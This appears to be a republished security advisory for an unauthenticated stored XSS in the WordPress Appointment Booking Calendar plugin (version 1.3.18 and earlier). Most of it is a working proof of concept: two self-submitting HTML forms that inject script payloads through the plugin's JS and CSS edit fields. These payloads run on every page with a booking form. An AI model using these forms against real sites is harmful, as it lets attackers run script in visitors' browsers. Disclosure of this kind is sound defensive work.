appointment-booking-calendar Appointment Booking Calendar <= 1.3.18 – Unauthenticated Stored XSS
<body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="js"/> <input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/> </form> </body> <body onload="document.forms[0].submit();"> <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="CP_ABC_post_edition" value=""/> <input type="hidden" name="cfwpp_edit" value="css"/> <input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/> </form> </body> The payload will be triggered in all pages with a booking form.

Source

SEO News and More

SEO News and More

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.

Share This